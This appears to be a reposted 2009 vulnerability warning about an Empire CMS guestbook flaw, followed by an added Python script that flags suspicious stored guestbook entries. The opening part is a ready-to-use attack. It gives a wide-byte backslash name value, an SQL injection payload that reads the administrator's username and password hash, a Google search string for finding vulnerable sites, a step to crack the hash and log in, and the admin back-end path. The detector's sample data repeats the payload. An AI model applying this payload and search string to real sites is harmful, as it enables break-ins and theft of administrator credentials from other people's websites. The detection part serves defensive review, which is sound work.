Empire CMS 0day with a high success rate - Vulnerability warning - Black Bar Safety Net

2009-07-13T00:00:00
ID MYHACK58:62200923854
Type myhack58
Reporter Anonymous
Modified 2009-07-13T00:00:00

Description

Find a site that runs Empire CMS and append the following directly to the site address: e/tool/gbook/?bid=1 This opens the Empire CMS guestbook. In the name field, write: 缞\ In the contact email field, write: ,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* After the message is submitted, the account and password are disclosed.

Test method: search Google for the keyword inurl:e/tool/gbook/?bid=1, then leave a message in the manner described above. The displayed result discloses the administrator account and the MD5 value of the password; crack the password and log in to the admin back end.

Admin back end: /e/admin/
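For site operators reviewing stored guestbook entries or captured form submissions, the following check flags the traits of the submission described above: a name ending in an unpaired backslash, a contact email that is not an address, and SQL syntax or the phome_enewsuser table name in any field. It is an added example, not Empire CMS code; the field names `name`, `email` and `text` are assumptions, and the sample entries are constructed.

```python
import re

# A contact email should be a plain address; anything else is suspicious.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# Tokens taken from the submission shown in the advisory above.
SQL_TOKENS = re.compile(r"\(\s*select\b|\bconcat\s*\(|phome_enewsuser|/\*", re.I)


def trailing_backslashes(value):
    """Count backslashes at the very end of a field value."""
    return len(value) - len(value.rstrip("\\"))


def inspect_entry(entry):
    """Return findings for one guestbook submission (dict of form fields)."""
    findings = []
    name = entry.get("name", "")    # hypothetical field name
    email = entry.get("email", "")  # hypothetical field name
    if trailing_backslashes(name) % 2 == 1:
        findings.append("name ends with an unpaired backslash")
    if email and not EMAIL_RE.match(email):
        findings.append("email is not a valid address")
    for field, value in entry.items():
        if SQL_TOKENS.search(value):
            findings.append(f"SQL syntax in field '{field}'")
    return findings


def flag_entries(entries):
    """Return the indexes of entries that have at least one finding."""
    return [i for i, e in enumerate(entries) if inspect_entry(e)]


# Constructed sample data: two ordinary messages and one that follows the
# pattern in the advisory (shortened).
SAMPLES = [
    {"name": "Li Wei", "email": "liwei@example.com", "text": "Nice site."},
    {"name": "缞\\",
     "email": ",1,(select concat(username,0x5f,password) from phome_enewsuser),1)/*",
     "text": "hello"},
    {"name": "Ann", "email": "ann@example.org",
     "text": "Please select a darker theme (if possible)."},
]

if __name__ == "__main__":
    for i in flag_entries(SAMPLES):
        print(i, inspect_entry(SAMPLES[i]))
```

Entries that are flagged in stored data indicate the administrator password hash may already have been disclosed, so the affected account's password should be changed.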